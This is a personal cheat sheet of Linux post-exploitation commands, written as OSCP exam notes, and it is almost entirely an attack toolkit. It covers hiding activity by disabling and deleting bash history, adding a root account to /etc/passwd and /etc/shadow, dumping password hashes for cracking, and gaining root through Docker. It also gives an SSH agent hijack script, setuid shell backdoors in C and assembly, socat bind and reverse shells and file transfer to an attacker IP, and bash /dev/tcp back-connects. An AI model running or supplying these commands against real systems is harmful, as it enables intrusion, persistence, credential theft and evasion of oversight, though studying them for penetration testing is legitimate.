Last changed: 08.07.2020
Linux post exploitation
This command list was also part of my notes for the Offensive Security Certified Professional exam. It summarizes some useful methods to gather information on a linux host after having gained command execution.
upgrade shell
To upgrade your shell to a fully functional interactive shell use the following commands
python -c 'import pty; pty.spawn("/bin/bash")'
CTRL+Z
stty raw -echo
fg
reset
bash history
To prevent bash
from writing commands after logout you can temporarily unset
its HISTFILE
or reload the old history before logging out.
unset HISTFILE
history -r
You can also turn off history and delete single entries.
set +o history
history -d -1
If HISTCONTROL
is set to ignorespace
or ignoreboth
command lines
beginning with a space will not be written to the history.
login information
A first step should be to determine which privileges you have and how often the system is accessed by other users.
show user privileges
id
whoami
capsh --print
login history
w
who
last
lastlog
failed logins
utpmdump /var/log/btmp
grep -i fail /var/log/auth.log
system information
distro and kernel info
cat /etc/issue
uname -a
hostname
hostname
hostname -f
running tasks
ps aux
pstree
kill -9 1234
killall ...
installed packages
dpkg -l
yum list installed
pacman -Q
environment variables
env
user management
usernames and password hashes
ls -l /home
cat /etc/passwd
echo "admin:`mkpasswd password`:0:0:admin,,,:/tmp:/bin/bash" >> /etc/passwd
cat /etc/shadow
echo "admin:x:0:0:admin,,,:/root:/bin/bash" >> /etc/passwd
echo "admin:`openssl passwd -6 password`:12345:0:99999:7:::" >> /etc/shadow
unshadow passwd shadow > passwd.unshadow
sudo permissions
sudo -l
cat /etc/sudoers
A nice collection of ways to start a shell from another program can be found on https://gtfobins.github.io/.
gain root with docker
docker container run -v /etc:/tmp/etc -i centos /bin/bash
network configuration
network interfaces
ip l
ip a
routes
ip r
ip r l t 0
ip r a 10.1.1.0/24 via 192.168.11.3
netstat -r
dns server
cat /etc/resolv.conf
open ports
netstat -tunap
ss -tunap
netstat -pelt
firewall rules
iptables -L
iptables -A INPUT -p tcp --dport 4444 -j ACCEPT
enable ssh
/etc/init.d/ssh start
service ssh start
systemctl start ssh
network
network scan
for ip in {1..254}; do arping -w1 -c1 192.168.199.$ip ; done
arp cache
arp -n
ip n
active connections
ss -tun
lsof -nPi
download file
curl -i http://1.2.3.4/
wget http://1.2.3.4/tool.zip
traffic dump
tcpdump -i eth0 upd port 53 -w dns.pcap
tshark -r dns.pcap -Y "dns.flags.response == 0" -T fields -e dns.qry.name
file system
df -h
lsblk -f
mount
mount -o remount,rw,exec /
searching files
grep
grep -rHi "string" /path
find
find /path -type f -exec grep -Hi "string" {} \;
find / -iname *\.bak -perm -004 -ls 2>/dev/null
find / -type f -amin -60 2>/dev/null
find / -type f -writable 2>/dev/null
find / -type d -writable 2>/dev/null
find / -type f -perm /6000 -ls 2>/dev/null
scheduled tasks
list scheduled scripts
ls /etc/cron.*
cat /etc/crontab
crontab -l
add new task
echo "* * * * * root date >> /tmp/log" >> /etc/crontab
crontab -e
crontab -r
ssh agent hijacking
If someone uses ssh agent forwarding and you can access this socket you can use his agent to authenticate.
hijack.sh
#!/bin/bash
while [ ! -e /tmp/ssh* ]; do
sleep 0.1
done
file=$(ls /tmp/ssh*/* | head -n1)
SSH_AUTH_SOCK="${file}" ssh root@localhost
network file system
create share
systemctl start nfs-server
echo "/srv/nfs_share *(rw, sync, nohide)" >> /etc/exports
exportfs -var
find and mount
nmap -Pn <network> -p 111,2049
showmount -e <target>
mount -t nfs <target>:/nfs_share /mnt/nfs
squashfs
modify squashfs image
unsquashfs image.file
vim squashfs-root/<file_to_change>
mksquashfs squashfs-root/ new_image.file -noappend -always-use-fragments
selfmade backdoors
setuid.c
#include <unistd.h>
#include <stdlib.h>
void main(void){
setuid(0);
system("/bin/sh");
}
setuid.asm
BITS 32
global _start
section .text
_start:
xor ebx,ebx
lea eax,[ebx+17h]
cdq
int 80h
xor ecx,ecx
push ecx
push 0x68732f6e
push 0x69622f2f
lea eax,[ecx+0bh]
mov ebx,esp
int 80h
compile asm
nasm -f elf setuid.asm
ld -o setuid -melf_i386 setuid.o
compile to shellcode
nasm -f bin setuid.asm -o shellcode
xxd -p shellcode
socat
backdoor
socat tcp-listen:4444,fork,reuseaddr exec:/bin/bash,pty,stderr,setsid,echo=0,raw
socat tcp-connect:<my_ip>:4444,fork,reuseaddr exec:/bin/bash,pty,stderr,setsid,echo=0,raw
file transfer
socat -u tcp-listen:4444,reuseaddr open:<filename>,creat
socat -u tcp-connect:<my_ip>:4444 file:<filename>
bash backconnect
The bash offers a pseudo device for creating network connections. The second command is an alternative doing the same as the first.
/bin/bash -i < /dev/tcp/localhost/8888 1>&0 2>&0
/bin/bash -i &> /dev/tcp/localhost/8888 0>&1
xserver backconect
To connect graphical applications to your local xserver you can use Xnest
Xnest :1
or configure x11 to allow inbound tcp connections and reboot.
/etc/gdm/custom.conf
[security]
DisallowTCP=false
In both cases you have to disable access control with
xhost +
On the victim you can start
xterm -display <target-ip>:1